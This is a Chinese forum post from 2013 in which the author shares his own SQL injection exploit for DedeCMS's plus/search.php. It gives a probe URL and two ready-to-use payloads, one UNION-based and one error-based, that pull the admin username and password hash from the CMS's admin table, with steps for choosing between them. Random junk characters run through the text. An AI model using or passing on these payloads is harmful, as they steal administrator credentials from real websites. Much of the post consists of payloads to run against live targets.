转载不加作者名的没JJ
* `( o! M% Q! E" ^7 c. x/ g( x
+ C6 C: q( ?& Y; }/ M哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。% U9 @0 T3 u& I: U j/ |9 y
# d+ k4 y7 l" B$ F
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。5 d& {8 }6 M" B
2 Q) S0 z& b7 G( i
我一般是这样测试的:
& p9 a' A# l/ L- N* U2 v7 E2 Y9 d5 t. v; H# s; v$ H: L, a
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
7 ~- C! k- y/ W' o# s* J7 p
?+ }; d$ E$ n& B# F/ s% k6 z转载不加作者名的没JJ0 O% m6 h8 E" M5 }
3 b' `& c# W" ^* Y3 q# \8 t
作者:鬼哥' J5 i8 l, R$ [9 B2 H$ s$ f
2 u- R) F( N+ ]3 j; I) ^
; L. E+ J( g6 g9 z2 H/ a
& F' m* L% o9 w- [8 a A/ d7 O看结果如果提示 O! c: X# e. {
0 i; k$ P. N3 n' Y
Safe Alert: Request Error step 2 !$ o+ x0 c" S }0 J1 p1 C
, }. S9 W3 z% d
那么直接用下面的exp4 i$ t, T/ ~8 _; }# p* U% f2 l
4 N/ B& Z* c& t5 ?
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a( F) x7 Z' d, l+ O
: U+ D# @- d0 P
8 I; w r' J" w看结果如果提示
+ O7 R2 ?& |% V" k" ^- Q" F, v) z$ f
Safe Alert: Request Error step 1 !
2 N$ v2 \$ ]3 |6 ~0 _' \) `. T* U1 |( I2 k
那么直接用下面的exp8 g c! ?/ Y5 z* I& p6 a
# ?: U* S) Z' i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# Y- ~1 Z4 Z9 y' g9 ]
# D$ i' q7 I: ~ U- N1 Y+ [$ z0 @
) T4 x6 h: I, y& d' z: e5 l如果正常显示证明漏洞不存在了。
' I9 I% E1 g9 ~# n1 u! l" T& O0 k7 g n0 c8 p6 x
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对